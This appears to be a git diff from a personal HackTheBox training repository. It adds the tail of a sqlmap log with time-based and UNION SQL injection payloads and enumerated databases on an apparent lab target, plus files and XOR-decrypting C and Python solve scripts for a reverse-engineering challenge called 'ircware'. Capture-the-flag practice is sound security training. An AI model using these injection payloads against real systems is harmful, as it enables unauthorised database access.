Payload: product=AUFB" AND (SELECT 9500 FROM (SELECT(SLEEP(5)))IiPL)-- CEjp + + Type: UNION query + Title: Generic UNION query (NULL) - 2 columns + Payload: product=AUFB" UNION ALL SELECT NULL,CONCAT(0x716a626271,0x586a4443534a6c465264737464587149507541587a587945725a56796552544f5078416478545242,0x71717a7171)-- - +--- +do you want to exploit this SQL injection? [Y/n] Y +[17:26:46] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Debian 9 (stretch) +web application technology: Apache 2.4.25 +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) +[17:26:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/cato/.local/share/sqlmap/output/results-05082026_0524pm.csv' + +available databases [4]: +[*] information_schema +[*] maindb +[*] mysql +[*] performance_schema + +Database: maindb +[1 table] ++----------+ +| products | ++----------+ + +current user: 'root@localhost' diff --git a/training/htb/challenges/rev/encrypted_data.txt b/training/htb/challenges/rev/encrypted_data.txt new file mode 100644 index 0000000..b912934 --- /dev/null +++ b/training/htb/challenges/rev/encrypted_data.txt @@ -0,0 +1 @@ +09071148207302682C6762023E367D1A1E351F072A1D3C0B712562577E30133B71072E diff --git a/training/htb/challenges/rev/ircware b/training/htb/challenges/rev/ircware new file mode 100644 index 0000000..7bdd45f Binary files /dev/null and b/training/htb/challenges/rev/ircware differ diff --git a/training/htb/challenges/rev/ircware.i64 b/training/htb/challenges/rev/ircware.i64 new file mode 100644 index 0000000..ae61ad1 Binary files /dev/null and b/training/htb/challenges/rev/ircware.i64 differ diff --git a/training/htb/challenges/rev/solve b/training/htb/challenges/rev/solve new file mode 100755 index 0000000..bdad487 Binary files /dev/null and b/training/htb/challenges/rev/solve differ diff --git a/training/htb/challenges/rev/solve.c b/training/htb/challenges/rev/solve.c new file mode 100644 index 0000000..efe2043 --- /dev/null +++ b/training/htb/challenges/rev/solve.c @@ -0,0 +1,42 @@ +#include + +char rolling_xor(char *key, char* encrypted_data) +{ + char* v0 = key; + int v1 = 0; + char *i = encrypted_data; + char result; + + for ( ; *i; ++i ) + { + result = *v0; + *i ^= *v0++; + if ( ++v1 == 8 ) + { + v0 = key; + v1 = 0; + } + } + return result; +} + +int main(){ + char encrypted_data[] = + { + 0x09, 0x07, 0x11, 0x48, 0x20, 0x73, 0x02, 0x68, 0x2C, 0x67, + 0x62, 0x02, 0x3E, 0x36, 0x7D, 0x1A, 0x1E, 0x35, 0x1F, 0x07, + 0x2A, 0x1D, 0x3C, 0x0B, 0x71, 0x25, 0x62, 0x57, 0x7E, 0x30, + 0x13, 0x3B, 0x71, 0x07, 0x2E, 0x00 + }; + + char key[] = + { + 0x52, 0x4A, 0x4A, 0x33, 0x44, 0x53, 0x43, 0x50, 0x00 + }; + + + rolling_xor(key, encrypted_data); + + printf("decrypted: %s\n", encrypted_data); + +} diff --git a/training/htb/challenges/rev/solve.py b/training/htb/challenges/rev/solve.py new file mode 100644 index 0000000..a07adf2 --- /dev/null +++ b/training/htb/challenges/rev/solve.py @@ -0,0 +1,25 @@ +from pwn import xor + +with open("./encrypted_data.txt", "r") as f: + data = f.readline() + +key = bytes.fromhex("524A4A3344534350") + +print(len(key)) + +dec_key = [] + +for s in key: + s -= 17 + if s < ord('A'): + s += 26 + dec_key.append(s) + +dec_key[3] = b"3"[0] + +print("".join(chr(c) for c in dec_key)) + +data = bytes.fromhex(data) + +print(xor(data, dec_key)) +